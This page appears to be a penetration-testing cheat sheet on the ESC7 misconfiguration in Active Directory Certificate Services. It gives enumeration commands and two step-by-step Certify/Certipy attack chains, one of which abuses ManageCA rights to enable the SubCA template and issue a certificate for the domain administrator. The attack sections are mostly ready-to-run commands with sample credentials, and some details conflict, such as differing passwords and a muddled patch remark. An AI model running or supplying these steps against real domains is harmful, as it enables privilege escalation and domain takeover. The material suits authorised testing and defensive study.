Skip to main content

ESC7

Vulnerable Certificate Authority Access Control where 2 sets of permissions poses security risks:

  • ManageCA (or ManageCertificates)
  • ManageCertificates (or Certificate Manager)

Enumerate using certsrv.msc

PS /home/bobbuilder> Get-CertificationAuthority -ComputerName dc.domain.local | Get-CertificationAuthorityAcl | select -expand Access

Query CA with certutil (EditFlags value)

Check if EDITF_ATTRIBUTESUBJECTALTNAME2 is set if the value is 1376590.

PS /home/bobbuilder> certutil.exe -config "LAB-DC.lab.local\lab-LAB-DC-CA" -getreg "policy\EditFlags"

Enumerate using PSPKI module

PS /home/bobbuilder> Import-Module .\PSPKI.ps1
PS /home/bobbuilder> Get-CertificationAuthority -ComputerName LAB-DC.lab.local | Get-CertificationAuthorityAcl | select -ExpandProperty access

ManageCA

Templates with ManageCA enables the principal to manipulate settings remotely using PSPKI. This includes toggling the EDITF_ATTRIBUTESUBJECTALTNAME2 flag to permit SAN specification in any template, a critical aspect of domain escalation.

Windows

Attack 1

ESC6 attack got patch on May of 2022. Note: this will not have any effect until the CA service (CertSvc) is restarted which ManageCA users have but they can't do it remotely.

  1. Request Certificate Template
PS /home/bobbuilder> certify.exe request /ca:<ca> /template:ApprovalNeeded
  1. Import PSPKI module
Import-Module PSPKI
  1. Approve Pending Request
PS /home/bobbuilder> Get-CertificationAuthority -ComputerName dc.domain.local | Get-PendingRequest -RequestID 336 | Approve-CertificateRequest
  1. Download Pending Request
PS /home/bobbuilder> certify.exe download /ca:<ca> /id:336

Attack 2

For this attack we only need ManageCA permission. We will need Manage Certificates permission and SubCA Certificate template enabled but they both can be enabled from ManageCA

  1. Grant Manage Certificates access (Optional, if we don't already)
certipy ca -ca 'corp-DC-CA' -add-officer john -username john@corp.local -password Passw0rd
  1. Enable SubCA Certificate template (Optional, if we don't already)
certipy ca -username john@corp.local -password Passw0rd! -target-ip ca.corp.local -ca 'corp-CA' -enable-template 'SubCA'
  1. Request certificate based on the SubCA template
certipy req -username john@corp.local -password Passw0rd -ca corp-DC-CA -target ca.corp.local -template SubCA -upn administrator@corp.local
  1. Issue the failed certificate
certipy ca -ca 'corp-DC-CA' -issue-request 785 -username john@corp.local -password Passw0rd
  1. Retrieve the issued certificate
certipy req -username john@corp.local -password Passw0rd -ca corp-DC-CA -target ca.corp.local -retrieve 785

ManageCA, Manage Certificates and SubCA

Disable EDITF_ATTRIBUTESUBJECTALTNAME2 with PowerShell

$ConfigReader.SetConfigEntry(1114446,"EditFlags","PolicyModules\CertificateAuthority_MicrosoftDefault.Policy") $ConfigReader.GetConfigEntry("EditFlags","PolicyModules\CertificateAuthority_MicrosoftDefault.Policy")